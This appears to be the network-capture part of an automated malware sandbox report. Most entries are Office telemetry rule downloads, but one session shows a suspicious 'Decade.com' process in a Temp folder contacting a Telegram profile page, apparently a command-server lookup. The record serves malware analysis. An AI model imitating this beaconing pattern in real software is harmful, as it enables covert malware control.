2024-12-04 11:17:00 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-12-04 11:17:00 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-12-04 11:17:00 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-12-04 11:17:00 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-12-04 11:17:00 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-12-04 11:17:01 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-12-04 11:17:01 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-12-04 11:17:01 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.4	49739	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:02 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:03 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:03 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: c4831996-901e-0016-39ce-45efe9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111703Z-1746fd949bdmv56chC1EWRypnn00000001b0000000002mks x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:03 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.4	49742	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:02 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:03 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:03 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: 9ac3d201-201e-0000-03c5-45a537000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111703Z-1746fd949bd4w8sthC1EWR7004000000010000000000000a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-04 11:17:03 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.4	49740	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:02 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:03 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:03 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 667c147a-501e-0016-34cc-45181b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111703Z-1746fd949bdfg4slhC1EWR34t0000000012g000000001tsc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:03 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.4	49741	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:02 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:03 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:03 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 40031d31-601e-005c-53c5-45f06f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111703Z-1746fd949bd7wvgbhC1EWR0rgs0000000190000000000r9v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:03 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	149.154.167.99	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:02 UTC	85	OUT	GET /m3wm0w HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:03 UTC	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 04 Dec 2024 11:17:03 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12294 Connection: close Set-Cookie: stel_ssid=4fc88db07ec9dbceda_11846824247810342106; expires=Thu, 05 Dec 2024 11:17:03 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-12-04 11:17:03 UTC	12294	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	49743	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:02 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:03 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:03 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: 115d5b31-c01e-0046-4bcb-452db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111703Z-1746fd949bd6zq92hC1EWRry48000000011g00000000638d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:03 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.4	49747	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:05 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:05 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:05 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: c2908fd4-501e-00a0-4ac8-459d9f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111705Z-1746fd949bdzd2qvhC1EWRcygw00000000w00000000047da x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-04 11:17:05 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	49745	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:05 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
